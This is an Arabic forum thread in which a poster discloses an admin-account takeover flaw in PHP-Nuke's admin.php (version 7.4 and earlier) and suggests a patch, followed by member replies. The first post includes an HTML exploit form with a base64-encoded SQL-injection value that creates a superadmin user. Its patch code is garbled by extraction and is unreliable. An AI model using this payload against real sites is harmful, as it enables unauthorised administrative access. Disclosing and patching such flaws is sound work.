صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 15 من 20

الموضوع: ثغرة النيوك الجديده , مع الترقيع !

  1. #1

    ثغرة النيوك الجديده , مع الترقيع !



    السلام عليكم ورحمة الله وبركاته

    اسعد الله مبدعي سوالف سوفت ,

    الثغرة في ملف : Admin.php

    وهي عبارة عن استثمار .. لخطاء برمجي بالملف ,,

    يمّكن المخترق من الحصول على حساب ادامن في مجلة النيوك ,,

    الاصدارات المصابة : 7.4 وما تحتها من اصدارات ,

    وهذا جزء من الكود الاستثماري للثغرة طبعا كود html:

    كود PHP:
        NOME
        <
    input type="text" name="add_name">
        <
    br>
        
    PASSWORD
        <
    input type="text" name="add_pwd">
        <
    br>
        
    E-MAIL
        <
    input type="text" name="add_email">
        <
    br>
        <
    input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
        <
    br>
        <
    input type="hidden" name="add_radminsuper" value="1">
        <
    br>
        <
    input type="hidden" name="op" value="AddAuthor">
      </
    p>
      <
    p>
        <
    input type="submit" name="Submit" value="Create Admin">
        <
    br>
      </
    p>
    </
    form

    الترقيع الصحيح :

    قم باضافة هذة السطور الى ملف admin.php

    كود PHP:
    if ( !empty($HTTP_GET_VARS['op']) ) {
    $op $HTTP_GET_VARS['op'];
    }

    if ( !empty(
    $HTTP_POST_VARS['op']) ) {
    $op $HTTP_POST_VARS['op'];

    مكتشف الثغرة : غير معروف

    مع التحية اخواني اصحاب المواقع ,





    __________________
    سبحان الله وبحمده سبحان الله العظيم

    ThE jOy Of HaCkEiNg WiTh UsA sItE
    CoDe HaCkEr غير متواجد حالياً


  2. #2
    عضو فعال
    تاريخ التسجيل
    Mar 2003
    المشاركات
    1,744


    يعطيك الف عافية

    لكن وش الحل في نظرك هل نرقي للنسخة
    7.5

    تحياتي





    العبقري غير متواجد حالياً

  3. #3
    عضو سوبر نشيط
    تاريخ التسجيل
    May 2004
    المشاركات
    953


    تسلم عزيزي والف شكر على الطريقه

    ولكن والله ان اصحاب النيوك مساكين كل يوم في ثغره

    الافضل يعمل العرب نيوك خاص بهم

    على العموم شكراً صديقي

    وعلى فكره موقعك رائع تسلم يمناك على التصميم الهادىء والمفيد





    NewGsm غير متواجد حالياً

  4. #4


    ارجع اقرا الموضوع جيدا



    لقد ذكرت الحل ,

    مع التحية





    __________________
    سبحان الله وبحمده سبحان الله العظيم

    ThE jOy Of HaCkEiNg WiTh UsA sItE
    CoDe HaCkEr غير متواجد حالياً

  5. #5


    NewGsm

    الف شكر على مرورك ,,

    ساحاول جاهدا .. وضع كل ثغرة جديده مع الترقيع الامني

    في هالمنتدى ,, لمصلحة كل صاحب موقع عربي

    مع التحية





    __________________
    سبحان الله وبحمده سبحان الله العظيم

    ThE jOy Of HaCkEiNg WiTh UsA sItE
    CoDe HaCkEr غير متواجد حالياً

  6. #6
    عضو سوبر نشيط
    تاريخ التسجيل
    Jun 2003
    المشاركات
    699


    السلام عليكم ورحمة الله ...

    شكـــراً ,,,





    BoO_SuLtAn غير متواجد حالياً

  7. #7
    عضو سوبر نشيط
    تاريخ التسجيل
    Mar 2002
    المشاركات
    792


    PHP NUKE 7.5 تعريب مغترب

    www.magtrb.com





    __________________
    في غربتي تغرب النور عن عيني ..... وش حاجتي في نور عين غاب غاليها
    امر السفر يانظر عيني قضى فيني ..... ونفسى على ما تعاف امر الله حاديها

    www.magtrb.com
    www.araboogle.com
    mkman غير متواجد حالياً

  8. #8




    تبقى النيوك ,, في مصاف المجلات الاكثر اختراقا

    مهما كان نوع التعريب ,, ونوع النسخه

    الله يكفي المواقع العربية شرها ,





    __________________
    سبحان الله وبحمده سبحان الله العظيم

    ThE jOy Of HaCkEiNg WiTh UsA sItE
    CoDe HaCkEr غير متواجد حالياً

  9. #9
    عضو نشيط جدا
    تاريخ التسجيل
    Feb 2003
    المشاركات
    484


    السلام عليكم
    ياليت تحدد اى سطر نضع فيه هااسطر من ملف الادمن
    تحياتي لك





    __________________
    أن أردت التحليق مع الصقور فلا تبقى مع الدجاج -----------
    تصميم...تطوير .برمجه....
    9fahad@gmail.com
    Lep_Lab غير متواجد حالياً

  10. #10
    عضو فعال جدا
    تاريخ التسجيل
    Feb 2003
    المشاركات
    2,047


    http://www.phpsecure.info/v2/.php
    من افضل المواقع لحماية السكربتات و الثغرات في السكربتات الPHP و به باتشات حماية تنزلها و تركبها على السكربت المثغور





    __________________
    -{Only God Can Judge Me}-
    القانون فوق الجميع و الجميع يموت بالجوع
    Dr-dre67 غير متواجد حالياً

  11. #11
    Banned
    تاريخ التسجيل
    Feb 2003
    المشاركات
    1,803


    أرجو من الأخ ميدو أن يقوم بحذف الكود الآن لإحتواءه على كود خطير .

    أرجو منك تحديد السطور التي نحذف منها الأكواد

    شكراً





    omar alzaabi غير متواجد حالياً

  12. #12
    عضو نشيط
    تاريخ التسجيل
    Jul 2003
    المشاركات
    252


    طيب هل يكفي حماية ملف الأدمن





    لودي غير متواجد حالياً

  13. #13
    Banned
    تاريخ التسجيل
    Feb 2003
    المشاركات
    1,803


    الأخ لودي ،، طبعاً حماية ملف الأدمن مب معناها إنك حميت المجلة ،،

    في الكثير من المشاكل و منها الويب مايل و التصويت و التعليقات و المقالات و الكثير ، يعني معظم المودليز فيها ثغرات ،

    لكن في حل ،، و هو يوم واحد بيي يخترق موقعك أرصد الآي بي و الحق عليه بمقدم خدمة النت و خلاص ------> قاعدة يتفلسف





    omar alzaabi غير متواجد حالياً

  14. #14
    عضو سوبر نشيط
    تاريخ التسجيل
    Aug 2002
    المشاركات
    715



    إلي يريد يدش يدش
    http://www.aladawi.net/nuke/admin.php





    __________________
    Linux For Server | Mac For Graphic | Windows For ٍٍٍٍٍSolitaire
    aladawi غير متواجد حالياً

  15. #15
    عضو نشيط
    تاريخ التسجيل
    Jul 2003
    المشاركات
    252


    ^
    ^
    ^
    علمنا كيف تكفى





    لودي غير متواجد حالياً





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض